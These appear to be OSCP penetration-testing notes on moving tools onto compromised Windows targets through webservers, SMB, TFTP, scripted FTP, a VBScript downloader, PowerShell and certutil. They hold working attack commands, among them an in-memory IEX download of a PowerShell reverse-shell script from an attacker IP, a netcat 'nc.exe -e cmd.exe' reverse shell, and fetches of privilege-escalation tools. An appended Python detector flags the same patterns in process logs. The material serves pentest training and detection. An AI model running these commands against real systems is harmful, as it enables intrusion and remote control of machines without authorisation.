OSCP Notes

INDEX


  1. simple webservers
  2. smbserver
  3. tftp
  4. ftp
  5. SCP
  6. VBScript
  7. powershell
  8. upgrade cmd to powershell

0 simple webserver


| python 2.7

python2 -m SimpleHTTPServer

| python3

python3 -m http.server

| ruby

ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"

| php

php -S 0.0.0.0:8888

 

1 SMB server (impacket)


impacket-smbserver

| kali:

smbserver.py myshare /tmp/smbshare -smb2

| windows:

net use M: \\<kali-ip>\myshare

| It can also be run straight from the SMB share

\\10.10.10.1\privesc.exe whoami

 

2 TFTP


Not the ideal file transfer protocol, but it may be present on the target and we can end up using it.

| hacker

root@kali: mkdir /tftp
root@kali: atftpd --daemon --port 69 /tftp
root@kali: cp nc.exe /tftp

| target

C:\Program Files\SLmail\System> tftp -i 192.168.30.5 GET nc.exe

 

3 FTP


The Windows ftp client is interactive, so we can't drive it from a non-interactive shell, but Windows ftp lets us use scripts :D

| hacker

root@kali: apt-get install pure-ftpd
root@kali: cat setup-ftp
root@kali: ./setup-ftp

Commands to put in the file:

root@kali: cat ftp.commands
echo open 192.168.58.5 21 > ftp.txt
echo offsec>> ftp.txt
echo lab>> ftp.txt
echo bin>> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

| target

C:\Program Files\SLmail\System> paste the commands above; it should run everything

 

4 SCP


scp <fileToUpload> user@remote:/path

 

5 VBScript


For older Windows versions

| script

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strUrl, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

| target

Paste the script above into the target shell.

C:\program> dir wget.vbs            (to check that the script is there)
C:\program> cscript wget.vbs http://192.168.30.5/exploit.exe exploit.exe

 

6 PowerShell


| Download File to path

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5/JuicyPotato.exe','C:\users\merlin\documents\potato.exe')"

| from a URL in the browser (piped into powershell from cmd):

echo (New-Object System.Net.WebClient).DownloadFile('http://10.10.10.3:8000/loli.txt','C:\Users\pelado\Desktop\loli.txt') | powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile

| Download a script and execute it in memory

powershell.exe  -nop -ep bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1')"

| PowerShell full paths:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe

| powershell wget

powershell wget "http://10.10.10.10/nc.exe" -outfile "nc.exe"
nc.exe -e cmd.exe 10.10.10.10 4444

wget.ps1

| kali

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://10.10.14.23:8000/PowerUp.ps1" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1

| target:

C:\programs> paste the lines above
C:\programs> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
C:\programs> dir new-exploit.exe
cool

 

7 certutil


| windows

certutil.exe -urlcache -split -f "http://ip-addr:port/file" [output-file]
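As an added example (not part of these notes), a small detector that flags the transfer patterns listed on this page in process command lines, the kind of thing a blue team would run over Sysmon Event ID 1 or EDR telemetry. The sample command lines, rule names and regexes are my own constructed assumptions, not a real product's signatures.

```python
import re

# Constructed process command lines in the style of Sysmon Event ID 1; not real telemetry.
SAMPLE_CMDLINES = [
    'certutil.exe -urlcache -split -f "http://10.0.0.5:8000/file" out.exe',
    "powershell.exe -nop -ep bypass -c \"IEX(New-Object Net.WebClient).downloadString('http://10.0.0.5/x.ps1')\"",
    "tftp -i 10.0.0.5 GET nc.exe",
    "ftp -s:ftp.txt",
    "cscript wget.vbs http://10.0.0.5/exploit.exe exploit.exe",
    # Two benign lines that use the same binaries legitimately and must not fire.
    "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256",
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
]

# Each rule: (name, case-insensitive regex over the whole command line).
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b", re.I)),
    ("powershell_webclient_download",
     re.compile(r"\bpowershell(\.exe)?\b.*(DownloadString|DownloadFile|wget|iwr|Invoke-WebRequest)\b.*https?://", re.I)),
    ("tftp_binary_get",
     re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\bGET\b", re.I)),
    ("ftp_scripted_session",
     re.compile(r"\bftp(\.exe)?\b.*-s:", re.I)),
    ("cscript_http_argument",
     re.compile(r"\b(cscript|wscript)(\.exe)?\b.*https?://", re.I)),
]


def classify(cmdline):
    """Return the names of every rule that fires on one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Return {cmdline: [rule names]} for each line that matched at least one rule."""
    hits = {}
    for line in cmdlines:
        names = classify(line)
        if names:
            hits[line] = names
    return hits


if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES).items():
        print(", ".join(names), "<-", line)
```

The rules key on the argument patterns (for example certutil with -urlcache and -f together) rather than on the binary name alone, so the legitimate certutil and powershell invocations in the sample set do not fire.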